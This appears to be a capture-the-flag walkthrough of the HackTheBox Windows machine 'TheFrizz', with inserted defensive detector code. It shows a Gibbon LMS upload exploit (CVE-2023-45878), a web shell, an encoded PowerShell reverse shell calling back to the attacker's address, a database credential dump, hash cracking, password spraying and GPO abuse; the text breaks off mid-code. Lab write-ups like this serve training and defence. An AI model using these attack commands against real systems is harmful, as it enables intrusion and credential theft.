Machine Information: TheFrizz is a medium-difficulty Windows machine featuring a web application showcasing Walkerville Elementary School and a Gibbon LMS instance.
IP: 10.10.11.60
Difficulty: Medium
Nmap
nmap 10.10.11.60 -v -p- -A nmap/nmap_
Nmap scan report for 10.10.11.60
Host is up (0.031s latency).
Not shown: 65515 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH for_Windows_9.5 (protocol 2.0)
53/tcp open domain Simple DNS Plus
80/tcp open http Apache httpd 2.4.58 (OpenSSL/3.1.3 PHP/8.2.12)
|_http-title: Did not follow redirect to http://frizzdc.frizz.htb/home/
|_http-server-header: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-08-22 06:46:04Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: frizz.htb0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: frizz.htb0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
9389/tcp open mc-nmf .NET Message Framing
49664/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49670/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
55113/tcp open msrpc Microsoft Windows RPC
55117/tcp open msrpc Microsoft Windows RPC
55126/tcp open msrpc Microsoft Windows RPC
Service Info: Hosts: localhost, FRIZZDC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2025-08-22T06:47:03
|_ start_date: N/A
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
|_clock-skew: 4h20m00s
Looking at the nmap scan, it is evident that this is an Active Directory machine. Since no credentials are provided, let's enumerate the accessible services. By far the most appealing is the HTTP service, as it requires no credentials.
┌──(kali㉿kali)-[~/Downloads/HTB/TheFrizz]
└─$ nxc smb 10.10.11.60
SMB 10.10.11.60 445 frizzdc [*] x64 (name:frizzdc) (domain:frizz.htb) (signing:True) (SMBv1:False) (NTLM:False)
I like to run netexec to check the domain and machine name while the scans are running. Notice that NTLM authentication is disabled. If NTLM authentication were enabled, an alternative starting point would be to check SMB for anonymous login and any accessible shares. Let's update the /etc/hosts file as follows so that the website's redirect resolves and we can access the site.
10.10.11.60 frizzdc.frizz.htb frizz.htb frizzdc
HTTP (Port 80)
Accessing the website on port 80 displays the elementary school website. Let's enumerate the website to see what information we can get from it.
The home page has a Hacking and Law tab that seems to contain base64-encoded strings.
Scrolling to the bottom of the website reveals testimonials. One of the testimonials appears interesting; it is possibly from one of the teachers.
On the top navigation bar there is a staff login page. Navigating to it reveals the LMS being used along with its version: the school uses Gibbon LMS, version 25.0.0. There is also a note informing users that Ms Fiona Frizzle is migrating the LMS to Azure Active Directory SSO.
I also explored the hyperlinks related to Ross Parker and the FAQs on the Gibbon LMS home page to find additional information, but that is not required for this box. The staff login page also has a login form. Possible next steps are to research exploits for the LMS, look for SQL injection on the login page, or brute-force the login page, as I already have one username, Ms Fiona Frizzle. As we have no information about the lockout policy, I will keep brute-forcing the login page as a last resort.
Researching Gibbon LMS 25.0.0
Looking at exploits for Gibbon, I found two possible RCE exploits for this version: one is an authenticated RCE and the other is unauthenticated. As we do not have any valid credentials so far, let's explore the unauthenticated RCE (CVE-2023-45878).
CVE-2023-45878: Gibbon LMS versions 25.0.1 and earlier are vulnerable to an arbitrary file upload that can lead to remote code execution (RCE). The issue stems from the rubrics_visualise_saveAjax.php endpoint, which notably does not require authentication. Because of this, unauthenticated attackers can upload malicious PHP files and execute arbitrary code on the server.
Exploiting CVE-2023-45878
I found a PoC on GitHub that uses python3 to exploit CVE-2023-45878.
Copy the exploit.py file to your system and test it by running a simple whoami command.
┌──(kali㉿kali)-[~/Downloads/HTB/TheFrizz/CVE-2023-45878]
└─$ python3 exploit.py -t frizz.htb -c "whoami"
[+] Uploading web shell as zwomrazk.php...
[+] Upload successful.
[+] Executing command on: http://frizz.htb/Gibbon-LMS/zwomrazk.php?cmd=whoami
[+] Command output:
frizz\w.webservice
Now, let's get a reverse shell to our machine by supplying our machine's IP and the port we are listening on. Before running the command, make sure your listener is ready on the port you specified. The exploit runs a PowerShell reverse shell payload on the victim machine and gives us a shell.
nc -nvlp 4445
┌──(kali㉿kali)-[~/Downloads/HTB/TheFrizz/CVE-2023-45878]
└─$ python3 exploit.py -t frizz.htb -s -i 10.10.14.2 -p 4445
[+] Uploading web shell as jobyjgrq.php...
[+] Upload successful.
[+] Sending PowerShell reverse shell payload to http://frizz.htb/Gibbon-LMS/jobyjgrq.php
[*] Make sure your listener is running: nc -lvnp 4445
[+] Executing command on: http://frizz.htb/Gibbon-LMS/jobyjgrq.php?cmd=powershell -NoP -NonI -W Hidden -Exec Bypass -EncodedCommand CgAgACAAIAAgACQAYwBsAGkAZQBuAHQAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBTAG8AYwBrAGUAdABzAC4AVABDAFAAQwBsAGkAZQBuAHQAKAAiADEAMAAuADEAMAAuADEANAAuADIAIgAsADQANAA0ADUAKQA7AAoAIAAgACAAIAAkAHM...................................................
[!] Error connecting to web shell: HTTPConnectionPool(host='frizz.htb', port=80): Read timed out. (read timeout=5)
Once the exploit is triggered, it connects back to our machine and gives us a shell as the w.webservice user.
┌──(kali㉿kali)-[~/Downloads/HTB/TheFrizz/CVE-2023-45878]
└─$ nc -nvlp 4445
listening on [any] 4445 ...
connect to [10.10.14.2] from (UNKNOWN) [10.10.11.60] 50217
whoami
frizz\w.webservice
PS C:\xampp\htdocs\Gibbon-LMS>
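From the defender's side, the exploit run above leaves a very recognisable trail in the Apache access log: an unauthenticated POST to rubrics_visualise_saveAjax.php, then requests to a newly created .php file carrying a cmd= parameter. The following detector is an added example written for this write-up; it is not part of the original post or of the PoC. The log lines are constructed, and the module directory the endpoint sits in is an assumption (the page only names the file), so the match is on the file name.

```python
"""Detection example added to this write-up (not part of the original post or the
PoC it uses): flag the CVE-2023-45878 pattern in Apache access logs, i.e. an
unauthenticated POST to rubrics_visualise_saveAjax.php followed by requests to a
freshly dropped .php file carrying a cmd= parameter.
The log lines and the module directory below are constructed for this demo."""
import re
from urllib.parse import parse_qs, urlsplit

# Apache "combined" format: client ident user [time] "METHOD target proto" status size ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)

# Endpoint named in the CVE text; the directory it sits in below is an assumption.
UPLOAD_ENDPOINT = "rubrics_visualise_saveAjax.php"

# Constructed sample: one benign visitor and one client reproducing the exploit flow.
SAMPLE_LOG = """\
10.10.14.2 - - [22/Aug/2025:06:50:01 +0000] "GET /Gibbon-LMS/ HTTP/1.1" 200 5123 "-" "Mozilla/5.0"
10.10.14.2 - - [22/Aug/2025:06:50:09 +0000] "POST /Gibbon-LMS/modules/Rubrics/rubrics_visualise_saveAjax.php HTTP/1.1" 200 0 "-" "python-requests/2.31"
10.10.14.2 - - [22/Aug/2025:06:50:10 +0000] "GET /Gibbon-LMS/zwomrazk.php?cmd=whoami HTTP/1.1" 200 21 "-" "python-requests/2.31"
10.10.14.5 - - [22/Aug/2025:06:51:00 +0000] "GET /Gibbon-LMS/index.php?q=/modules/Rubrics/rubrics.php HTTP/1.1" 200 8800 "-" "Mozilla/5.0"
"""


def parse_line(line):
    """Parse one combined-format line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    parts = urlsplit(rec["target"])
    rec["path"] = parts.path
    rec["query"] = parse_qs(parts.query)
    return rec


def find_upload_rce(log_text):
    """Return (client, kind, path) alerts in log order.

    kind == "upload":   POST to the unauthenticated rubric upload endpoint
    kind == "webshell": any .php request with a cmd= parameter from a client
                        that hit the upload endpoint earlier in the log
    """
    alerts = []
    uploaders = set()
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        if rec["method"] == "POST" and rec["path"].endswith("/" + UPLOAD_ENDPOINT):
            uploaders.add(rec["ip"])
            alerts.append((rec["ip"], "upload", rec["path"]))
        elif rec["path"].endswith(".php") and "cmd" in rec["query"] and rec["ip"] in uploaders:
            alerts.append((rec["ip"], "webshell", rec["path"]))
    return alerts


if __name__ == "__main__":
    for client, kind, path in find_upload_rce(SAMPLE_LOG):
        print(f"{kind:8} {client} {path}")
```

The correlation on client address is deliberate: a POST to the upload endpoint alone may be a legitimate rubric save, but a .php file that did not exist before being requested with a cmd= parameter from the same client is the web shell. Patching to a version after 25.0.1 removes the root cause; the detector is for finding runs that already happened.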
Enumerating as the w.Webservice User
Once we have a shell, the next step is to enumerate the machine to see what this user has access to and what we can do with it. Another possible way forward is to upload a SharpHound collector and gather data for BloodHound. First, I checked the list of users and the privileges this user has.
PS C:\xampp\htdocs\Gibbon-LMS> net user
User accounts for \\FRIZZDC
-------------------------------------------------------------------------------
a.perlstein Administrator c.ramon
c.sandiego d.hudson f.frizzle
g.frizzle Guest h.arm
J.perlstein k.franklin krbtgt
l.awesome m.ramon M.SchoolBus
p.terese r.tennelli t.wright
v.frizzle w.li w.Webservice
The command completed successfully.
PS C:\xampp\htdocs\Gibbon-LMS> whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== ========
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
Looking at the files, there is a config.php file with hard-coded DB credentials. After gathering the credentials, I ran netstat to confirm that MySQL is running.
PS C:\xampp\htdocs\Gibbon-LMS> type config.php
<?php
/*
Gibbon, Flexible & Open School System
Copyright (C) 2010, Ross Parker
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
*/
/**
* Sets the database connection information.
* You can supply an optional $databasePort if your server requires one.
*/
$databaseServer = 'localhost';
$databaseUsername = 'MrGibbonsDB';
$databasePassword = 'Mister[Redacted]]';
$databaseName = 'gibbon';
/**
PS C:\xampp\htdocs\Gibbon-LMS> netstat -ant
Active Connections
Proto Local Address Foreign Address State Offload State
...........................................................................
TCP 0.0.0.0:636 0.0.0.0:0 LISTENING InHost
TCP 0.0.0.0:3268 0.0.0.0:0 LISTENING InHost
TCP 0.0.0.0:3269 0.0.0.0:0 LISTENING InHost
TCP 0.0.0.0:3306 0.0.0.0:0 LISTENING InHost
...........................................................................
I found the mysql.exe binary in the C:\xampp\mysql\bin\ directory, which we can use to connect to the database and see what data we can access. The gibbon database has a ‘gibbonperson’ table holding credentials for the f.frizzle user, one of the teachers referred to on the website. The credentials include the password hash and the salt.
PS C:\xampp\mysql\bin> .\mysql.exe -u MrGibbonsDB -pMisterGibbs!Parrot!?1 --database=gibbon -e "select * from gibbonperson;"
gibbonPersonID title surname firstName preferredName officialName nameInCharacters gender username passwordStrong passwordStrongSalt passwordForceReset
0000000001 Ms. Frizzle Fiona Fiona Fiona Frizzle Unspecified f.frizzle 067f746faca44f170c6cd9[..SNIP..]80ff784242b0b0c03 /aACFh[..SNIP..]]z2489 N Full Y 001 001NULL f.frizzle@frizz.htb
Before attempting to crack the hash, we need to know the hash type. I used hash-identifier, which reports SHA-256. Looking at the hashcat wiki, the mode for salted SHA-256 is 1420. Let's attempt to crack this hash using the rockyou wordlist.
┌──(kali㉿kali)-[~/Downloads/HTB/TheFrizz/files]
└─$ hash-identifier 067f746faca44f170c6cd9[..SNIP..]8687733f80ff784242b0b0c03
#########################################################################
# __ __ __ ______ _____ #
# /\ \/\ \ /\ \ /\__ _\ /\ _ `\ #
# \ \ \_\ \ __ ____ \ \ \___ \/_/\ \/ \ \ \/\ \ #
# \ \ _ \ /'__`\ / ,__\ \ \ _ `\ \ \ \ \ \ \ \ \ #
# \ \ \ \ \/\ \_\ \_/\__, `\ \ \ \ \ \ \_\ \__ \ \ \_\ \ #
# \ \_\ \_\ \___ \_\/\____/ \ \_\ \_\ /\_____\ \ \____/ #
# \/_/\/_/\/__/\/_/\/___/ \/_/\/_/ \/_____/ \/___/ v1.2 #
# By Zion3R #
# www.Blackploit.com #
# Root@Blackploit.com #
#########################################################################
--------------------------------------------------
Possible Hashs:
[+] SHA-256
[+] Haval-256
Cracking F.Frizzle Password
hashcat -m 1420 frizzle.hash /usr/share/wordlists/rockyou.txt -O
Hashcat successfully cracked the password for this user.
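Before committing GPU time to a wordlist it is worth confirming the concatenation order the hash uses, since hashcat mode 1420 is sha256($salt.$pass) while 1410 is sha256($pass.$salt), and the wrong mode never cracks anything. The check below is an added example written for this write-up, not code from the original post or from Gibbon; it assumes Gibbon's passwordStrong column is the 1420 form (the mode the write-up uses successfully) and uses a constructed test credential rather than the real one from the dump.

```python
"""Check added to this write-up (not from the original post): confirm how a
passwordStrong/passwordStrongSalt pair is computed before spending time cracking.
hashcat mode 1420 (used above) is sha256($salt.$pass); 1410 is sha256($pass.$salt).
The credential below is constructed; the salt only mimics the shape seen in the dump."""
import hashlib
import hmac

MODES = {
    1420: lambda password, salt: salt + password,   # $salt.$pass
    1410: lambda password, salt: password + salt,   # $pass.$salt
}


def salted_sha256(password: str, salt: str, mode: int = 1420) -> str:
    """Hex SHA-256 over the concatenation order that the given hashcat mode uses."""
    return hashlib.sha256(MODES[mode](password, salt).encode("utf-8")).hexdigest()


def verify(password: str, salt: str, stored_hex: str, mode: int = 1420) -> bool:
    """Constant-time comparison of one candidate against the stored hex digest."""
    return hmac.compare_digest(salted_sha256(password, salt, mode), stored_hex.lower())


def identify_mode(password: str, salt: str, stored_hex: str):
    """For a credential you already know (e.g. a test account you control),
    return the hashcat modes whose concatenation order reproduces stored_hex."""
    return sorted(m for m in MODES if verify(password, salt, stored_hex, m))


# Constructed test account: salt shaped like the dump's, password chosen for the demo.
TEST_SALT = "/aACFhdemoSaltValue"
TEST_PASSWORD = "Summer2024!"
TEST_HASH = salted_sha256(TEST_PASSWORD, TEST_SALT, 1420)

if __name__ == "__main__":
    print("stored hash :", TEST_HASH)
    print("modes match :", identify_mode(TEST_PASSWORD, TEST_SALT, TEST_HASH))
    print("wrong guess :", verify("password1", TEST_SALT, TEST_HASH))
```

The same check explains why the rockyou run finishes quickly: a single SHA-256 round, salted or not, costs one hash evaluation per guess, so a modern GPU tests billions of candidates per second. Application owners assessing this storage scheme would want a memory-hard or iterated KDF (bcrypt, scrypt, Argon2) instead, which turns the same wordlist run from seconds into an impractical job.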
Using F.Frizzle Credentials
To use the credentials, we need to request a ticket for this user and configure a krb5.conf file, as only Kerberos authentication is allowed. First, let's request a TGT for this user using impacket's getTGT. After obtaining the ticket, it can be verified with netexec.
┌──(kali㉿kali)-[~/Downloads/HTB/TheFrizz/files]
└─$ getTGT.py frizz.htb/'f.frizzle':'[Password_Redacted]'
Impacket v0.9.19 - Copyright 2019 SecureAuth Corporation
[*] Saving ticket in f.frizzle.ccache
┌──(kali㉿kali)-[~/Downloads/HTB/TheFrizz/files]
└─$ export KRB5CCNAME=/home/kali/Downloads/HTB/TheFrizz/files/f.frizzle.ccache
┌──(kali㉿kali)-[~/Downloads/HTB/TheFrizz/files]
└─$ nxc smb 10.10.11.60 -u 'f.frizzle' -p '[Password_Redacted]' -k
SMB 10.10.11.60 445 frizzdc [*] x64 (name:frizzdc) (domain:frizz.htb) (signing:True) (SMBv1:False) (NTLM:False)
SMB 10.10.11.60 445 frizzdc [+] frizz.htb\f.frizzle:[Redacted]
Logging in over SSH as f.frizzle
As we have valid credentials, let's use them to log in over SSH. Before logging in, I need to set up the krb5.conf file; I set it up as follows. You can also use the netexec module to generate a krb5.conf file. Once the file is in place, set the environment variable so that it is used for authentication.
┌──(kali㉿kali)-[~/Downloads/HTB/TheFrizz/files]
└─$ cat frizz
[libdefaults]
dns_lookup_kdc = false
dns_lookup_realm = false
default_realm = FRIZZ.HTB
[realms]
FRIZZ.HTB = {
kdc = frizzdc.frizz.htb
admin_server = frizzdc.frizz.htb
default_domain = frizz.htb
}
[domain_realm]
.frizz.htb = FRIZZ.HTB
frizz.htb = FRIZZ.HTB
┌──(kali㉿kali)-[~/Downloads/HTB/TheFrizz/files]
└─$ export KRB5_CONFIG=/home/kali/Downloads/HTB/TheFrizz/files/frizz
Once everything is set up, you can log in over SSH as follows. Once logged in, this user can also retrieve the user flag. If the SSH login fails, make sure you have set up the /etc/hosts file as mentioned earlier.
ssh f.frizzle@frizzdc.frizz.htb -K
At this point, you can also run winPEAS for privilege escalation. Going through the box, I found a Recycle Bin folder containing 7z files. I copied these files using scp.
PS C:\$RECYCLE.BIN\S-1-5-21-2386970044-1145388522-2932701813-1103> dir
Directory: C:\$RECYCLE.BIN\S-1-5-21-2386970044-1145388522-2932701813-1103
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a--- 10/29/2024 7:31 AM 148 $IE2XMEG.7z
-a--- 10/24/2024 9:16 PM 30416987 $RE2XMEG.7z
┌──(kali㉿kali)-[~/Downloads/HTB/TheFrizz/files]
└─$ scp f.frizzle@frizzdc.frizz.htb:'C:/$RECYCLE.BIN/S-1-5-21-2386970044-1145388522-2932701813-1103/$IE2XMEG.7z' ./IE2XMEG.7z
$IE2XMEG.7z
┌──(kali㉿kali)-[~/Downloads/HTB/TheFrizz/files]
└─$ scp f.frizzle@frizzdc.frizz.htb:'C:/$RECYCLE.BIN/S-1-5-21-2386970044-1145388522-2932701813-1103/$RE2XMEG.7z' ./RE2XMEG.7z
$RE2XMEG.7z
Unzipping these files gave a potential password for one of the domain users. The password appeared to be base64-encoded and can be decoded.
┌──(kali㉿kali)-[~/Downloads/HTB/TheFrizz/files]
└─$ echo IXN1QmNpZ0BNZWhUZWQhUgo= | base64 -d
!suB[REDACTED]
Spraying the Password
Every time we have a potential password, we should spray it against the domain users to see if we get a valid login, as password reuse is very common. Let's use netexec to get a user list and spray the password against it.
┌──(kali㉿kali)-[~/Downloads/HTB/TheFrizz/files]
└─$ nxc smb 10.10.11.60 -u 'f.frizzle' -p '[Redacted]' -k --users
SMB 10.10.11.60 445 frizzdc [*] x64 (name:frizzdc) (domain:frizz.htb) (signing:True) (SMBv1:False) (NTLM:False)
SMB 10.10.11.60 445 frizzdc [+] frizz.htb\f.frizzle:[Redacted]
SMB 10.10.11.60 445 frizzdc -Username- -Last PW Set- -BadPW- -Description-
SMB 10.10.11.60 445 frizzdc Administrator 2025-02-25 21:24:10 0 Built-in account for administering the computer/domain
SMB 10.10.11.60 445 frizzdc Guest <never> 0 Built-in account for guest access to the computer/domain
SMB 10.10.11.60 445 frizzdc krbtgt 2024-10-29 14:19:54 0 Key Distribution Center Service Account
SMB 10.10.11.60 445 frizzdc f.frizzle 2024-10-29 14:27:03 0 Wizard in Training
SMB 10.10.11.60 445 frizzdc w.li 2024-10-29 14:27:03 0 Student
SMB 10.10.11.60 445 frizzdc h.arm 2024-10-29 14:27:03 0 Student
SMB 10.10.11.60 445 frizzdc M.SchoolBus 2024-10-29 14:27:03 0 Desktop Administrator
SMB 10.10.11.60 445 frizzdc d.hudson 2024-10-29 14:27:03 0 Student
SMB 10.10.11.60 445 frizzdc k.franklin 2024-10-29 14:27:03 0 Student
SMB 10.10.11.60 445 frizzdc l.awesome 2024-10-29 14:27:03 0 Student
SMB 10.10.11.60 445 frizzdc t.wright 2024-10-29 14:27:03 0 Student
SMB 10.10.11.60 445 frizzdc r.tennelli 2024-10-29 14:27:04 0 Student
SMB 10.10.11.60 445 frizzdc J.perlstein 2024-10-29 14:27:04 0 Student
SMB 10.10.11.60 445 frizzdc a.perlstein 2024-10-29 14:27:04 0 Student
SMB 10.10.11.60 445 frizzdc p.terese 2024-10-29 14:27:04 0 Student
SMB 10.10.11.60 445 frizzdc v.frizzle 2024-10-29 14:27:04 0 The Wizard
SMB 10.10.11.60 445 frizzdc g.frizzle 2024-10-29 14:27:04 0 Student
SMB 10.10.11.60 445 frizzdc c.sandiego 2024-10-29 14:27:04 0 Student
SMB 10.10.11.60 445 frizzdc c.ramon 2024-10-29 14:27:04 0 Student
SMB 10.10.11.60 445 frizzdc m.ramon 2024-10-29 14:27:04 0 Student
SMB 10.10.11.60 445 frizzdc w.Webservice 2024-10-29 14:27:04 0 Service for the website
SMB 10.10.11.60 445 frizzdc [*] Enumerated 21 local users: frizz
┌──(kali㉿kali)-[~/Downloads/HTB/TheFrizz/files]
└─$ nxc smb 10.10.11.60 -u users.txt -p '!suB[Redacted]' -k
SMB 10.10.11.60 445 frizzdc [*] x64 (name:frizzdc) (domain:frizz.htb) (signing:True) (SMBv1:False) (NTLM:False)
SMB 10.10.11.60 445 frizzdc [-] frizz.htb\Administrator:!suB[Redacted] KDC_ERR_PREAUTH_FAILED
SMB 10.10.11.60 445 frizzdc [-] frizz.htb\f.frizzle:!suB[Redacted] KDC_ERR_PREAUTH_FAILED
SMB 10.10.11.60 445 frizzdc [-] frizz.htb\w.li:!suB[Redacted] KDC_ERR_PREAUTH_FAILED
SMB 10.10.11.60 445 frizzdc [-] frizz.htb\h.arm:!suB[Redacted] KDC_ERR_PREAUTH_FAILED
SMB 10.10.11.60 445 frizzdc [+] frizz.htb\M.SchoolBus:!suB[Redacted]
I found valid credentials for the M.SchoolBus user. Let's see what type of access this user has by checking BloodHound.
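Each KDC_ERR_PREAUTH_FAILED line that netexec printed during the spray corresponds to a Security event 4771 (Kerberos pre-authentication failed, Status 0x18) on the domain controller, so the spray is visible to a defender as one client address failing against many distinct accounts in a short window. The detector below is an added example written for this write-up, not code from the original post; the events are constructed and use simplified field names (user, client, status) rather than the full Windows XML schema.

```python
"""Detection example added to this write-up (not part of the original post): spot a
password spray from Kerberos pre-authentication failures. Each KDC_ERR_PREAUTH_FAILED
is a Security event 4771 on the DC with Status 0x18; a spray shows up as one client
address failing for many distinct accounts in a short window. Sample events are
constructed and use simplified field names."""
from collections import defaultdict
from datetime import datetime, timedelta

SAMPLE_EVENTS = [
    # one client, four accounts, one wrong password each (the spray)
    {"time": "2025-08-22T07:10:01", "id": 4771, "user": "Administrator", "client": "::ffff:10.10.14.2", "status": "0x18"},
    {"time": "2025-08-22T07:10:02", "id": 4771, "user": "f.frizzle", "client": "::ffff:10.10.14.2", "status": "0x18"},
    {"time": "2025-08-22T07:10:02", "id": 4771, "user": "w.li", "client": "::ffff:10.10.14.2", "status": "0x18"},
    {"time": "2025-08-22T07:10:03", "id": 4771, "user": "h.arm", "client": "::ffff:10.10.14.2", "status": "0x18"},
    # the one account the password matched: a TGT is issued (4768), no 4771 at all
    {"time": "2025-08-22T07:10:04", "id": 4768, "user": "M.SchoolBus", "client": "::ffff:10.10.14.2", "status": "0x0"},
    # a user mistyping their own password three times: one account, not a spray
    {"time": "2025-08-22T07:12:10", "id": 4771, "user": "w.li", "client": "::ffff:10.10.11.35", "status": "0x18"},
    {"time": "2025-08-22T07:12:25", "id": 4771, "user": "w.li", "client": "::ffff:10.10.11.35", "status": "0x18"},
    {"time": "2025-08-22T07:12:40", "id": 4771, "user": "w.li", "client": "::ffff:10.10.11.35", "status": "0x18"},
]


def detect_spray(events, min_users=3, window=timedelta(minutes=5)):
    """Return {client: [users]} for clients with 4771/0x18 failures against at
    least `min_users` distinct accounts inside some `window`-long span."""
    failures = defaultdict(list)
    for ev in events:
        if ev["id"] == 4771 and ev["status"].lower() == "0x18":
            failures[ev["client"]].append(
                (datetime.fromisoformat(ev["time"]), ev["user"].lower())
            )
    hits = {}
    for client, items in failures.items():
        items.sort()
        # slide a window starting at each failure and count distinct accounts in it
        for i, (start, _) in enumerate(items):
            users = {u for t, u in items[i:] if t - start <= window}
            if len(users) >= min_users:
                hits[client] = sorted(users)
                break
    return hits


if __name__ == "__main__":
    for client, users in detect_spray(SAMPLE_EVENTS).items():
        print(f"possible spray from {client}: {len(users)} accounts -> {', '.join(users)}")
```

Counting distinct accounts per source, rather than failures per account, is what separates a spray from an ordinary typo: the spray produces exactly one failure per user, which never trips a per-account lockout threshold, while the legitimate user retrying their own password trips nothing here either. Note that the account the password matched leaves no 4771 at all, only a successful 4768, so the successful login is found by correlating it with the burst that preceded it from the same client.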
BloodHound
After gaining the f.frizzle credentials, I also used them to collect BloodHound data to enumerate the domain.
┌──(kali㉿kali)-[~/Downloads/HTB/TheFrizz/bloodhound]
└─$ bloodhound-python -d frizz.htb -u 'f.frizzle' -p '[Password_Redacted]' -ns 10.10.11.60 -c all -k
INFO: BloodHound.py for BloodHound LEGACY (BloodHound 4.2 and 4.3)
INFO: Found AD domain: frizz.htb
INFO: Using TGT from cache
INFO: Found TGT with correct principal in ccache file.
INFO: Connecting to LDAP server: frizzdc.frizz.htb
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: frizzdc.frizz.htb
INFO: Found 22 users
INFO: Found 53 groups
INFO: Found 2 gpos
INFO: Found 2 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: frizzdc.frizz.htb
INFO: Done in 00M 06S
The M.SchoolBus user has the WriteGPLink right over class_frizz, which contains one of the domain admins. This means we can abuse it to add a new GPO and add ourselves as an administrator on the machine. This would not be appropriate in a real-world engagement, but it is safe to do in a CTF environment.
Abusing WriteGPLink with SharpGPOAbuse
Before I can abuse this right, I need to set up Kerberos authentication for the M.SchoolBus user. Once logged in, I created a new GPO and linked it to the domain. After that, I transferred the SharpGPOAbuse executable to add the M.SchoolBus user to the local Administrators group on the machine, giving us administrator rights.
┌──(kali㉿kali)-[~/Downloads/HTB/TheFrizz/files]
└─$ getTGT.py frizz.htb/M.SchoolBus
Impacket v0.9.19 - Copyright 2019 SecureAuth Corporation
Password:
[*] Saving ticket in M.SchoolBus.ccache
┌──(kali㉿kali)-[~/Downloads/HTB/TheFrizz/files]
└─$ export KRB5CCNAME=/home/kali/Downloads/HTB/TheFrizz/files/M.SchoolBus.ccache
┌──(kali㉿kali)-[~/Downloads/HTB/TheFrizz/files]
└─$ ssh M.SchoolBus@frizzdc.frizz.htb
PowerShell 7.4.5
PS C:\Users\M.SchoolBus>
New-GPO -Name "zm" | New-GPLink -Target "OU=DOMAIN CONTROLLERS,DC=FRIZZ,DC=HTB" -LinkEnabled Yes
After creating and linking the new GPO, let's transfer the SharpGPOAbuse binary by setting up an HTTP server and downloading the file with PowerShell's download functionality.
python3 -m http.server
PS C:\Users\M.SchoolBus> (New-Object Net.WebClient).DownloadFile('http://10.10.14.2:8000/SharpGPOAbuse.exe','SharpGPOAbuse.exe')
Now, let's add the user to the local Administrators group. Once the user is added, force a policy update across the domain.
PS C:\Users\M.SchoolBus> .\SharpGPOAbuse.exe --AddLocalAdmin --UserAccount M.SchoolBus --GPOName "zm" --force
[+] Domain = frizz.htb
[+] Domain Controller = frizzdc.frizz.htb
[+] Distinguished Name = CN=Policies,CN=System,DC=frizz,DC=htb
[+] SID Value of M.SchoolBus = S-1-5-21-2386970044-1145388522-2932701813-1106
[+] GUID of "zm" is: {8E47956B-4D5F-4F55-890B-F632EBF1FDDC}
[+] Creating file \\frizz.htb\SysVol\frizz.htb\Policies\{8E47956B-4D5F-4F55-890B-F632EBF1FDDC}\Machine\Microsoft\Windows NT\SecEdit\GptTmpl.inf
[+] versionNumber attribute changed successfully
[+] The version number in GPT.ini was increased successfully.
[+] The GPO was modified to include a new local admin. Wait for the GPO refresh cycle.
[+] Done!
PS C:\Users\M.SchoolBus> gpupdate /force
Updating policy...
Computer Policy update has completed successfully.
User Policy update has completed successfully.
Once the policy is updated, you can see that M.SchoolBus is a member of the local Administrators group.
PS C:\Users\M.SchoolBus> net localgroup Administrators
Alias name Administrators
Comment Administrators have complete and unrestricted access to the computer/domain
Members
-------------------------------------------------------------------------------
Administrator
M.SchoolBus
The command completed successfully.
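The SharpGPOAbuse output above also spells out what a defender can look for on the domain controller: a new groupPolicyContainer object, a gPLink change on the target OU, and a write to GptTmpl.inf under SYSVOL, all by the same non-admin account within minutes. The detector below is an added example written for this write-up, not code from the original post or from SharpGPOAbuse. It assumes Directory Service Changes auditing (events 5136 and 5137, which need a SACL on the policies container and OUs) and Detailed File Share auditing (event 5145) are enabled; the events are constructed with simplified field names, and the only page-specific value reused is the GPO GUID printed above.

```python
"""Detection example added to this write-up (not part of the original post or of
SharpGPOAbuse): reconstruct the GPO-abuse chain from Domain Controller Security
events. 5137 = directory object created (the new groupPolicyContainer),
5136 = directory object modified (gPLink on the target OU), 5145 = share access
check (the GptTmpl.inf write into SYSVOL). A subject that both links a GPO and
writes GptTmpl.inf inside a short window is flagged. Sample events are constructed
with simplified field names; the GPO GUID is the one the tool printed above."""
from collections import defaultdict
from datetime import datetime, timedelta

GPO_GUID = "{8E47956B-4D5F-4F55-890B-F632EBF1FDDC}"

SAMPLE_EVENTS = [
    {"time": "2025-08-22T08:01:10", "id": 5137, "subject": "FRIZZ\\M.SchoolBus",
     "class": "groupPolicyContainer",
     "object": f"CN={GPO_GUID},CN=Policies,CN=System,DC=frizz,DC=htb"},
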